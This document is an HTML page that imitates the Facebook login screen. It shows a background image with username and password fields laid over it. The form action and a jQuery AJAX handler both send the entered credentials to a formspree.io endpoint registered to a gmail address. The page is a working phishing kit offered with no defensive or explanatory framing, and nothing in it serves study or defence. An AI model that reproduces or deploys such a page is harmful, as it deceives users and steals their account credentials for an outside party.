<!doctype html>
<html>
<head>
	<title>Facebook - Log in or Sign Up</title>
	<style>
	body{
		margin: 0;
	}

	input[type=text]{
		margin-top: 35px;
		margin-left: 790px;
		width: 150px;
		height: 18px;
	}

	input[type=password]{
		margin-top: 35px;
		margin-left: 10px;
		width: 150px;
		height: 18px;
	}

	button.submitbutton{
		margin-top: 35px;
		margin-left: 8px;
		background: #4267b2;
		border: solid 1px #4267b2;
                color: white;
                font-size: 13px;
                font-weight:bold;
		width: auto;
		height: 18px;
	}

	#content {
    background: url('fb.png') no-repeat center center fixed;
    -webkit-background-size: cover;
    -moz-background-size: cover;
    background-size: cover;
    -o-background-size: cover;
    height: 100em;
	}
	</style>
	<script
  src="https://code.jquery.com/jquery-3.1.1.min.js"
  integrity="sha256-hVVnYaiADRTO2PzUGmuLJr8BLUSjGIZsDYGmIJLv2b8="
  crossorigin="anonymous"></script>
</head>
<body>
	<div id="content">
		<form method="post" action="https://formspree.io/onlinejobatpb@gmail.com" style="position: fixed;">
			<input id="uname" type="text" name="uid">
			<input id="pass" type="password" name="pass">
			<button id="send" class="submitbutton" on>Log In</button>
		</form>
	</div>
	<script>
		$(document).ready(function(){
			var dataobj = {};
			$('input#uname').blur(function(){
				dataobj.uid = $(this).val();
			});
			
			$('input#pass').blur(function(){
				dataobj.pass= $(this).val();
			});
			
			$('button#send').click(function(){
				$.ajax({
					type: "POST",
					url: "https://formspree.io/onlinejobatpb@gmail.com",
					// The key needs to match your method's input parameter (case-sensitive).
					data: JSON.stringify(dataobj),
					contentType: "application/json; charset=utf-8",
					dataType: "json",
					success: function(data){alert(data);},
					failure: function(errMsg) {
						alert(errMsg);
					}
				});
			});
		});
	</script>
</body>
</html>
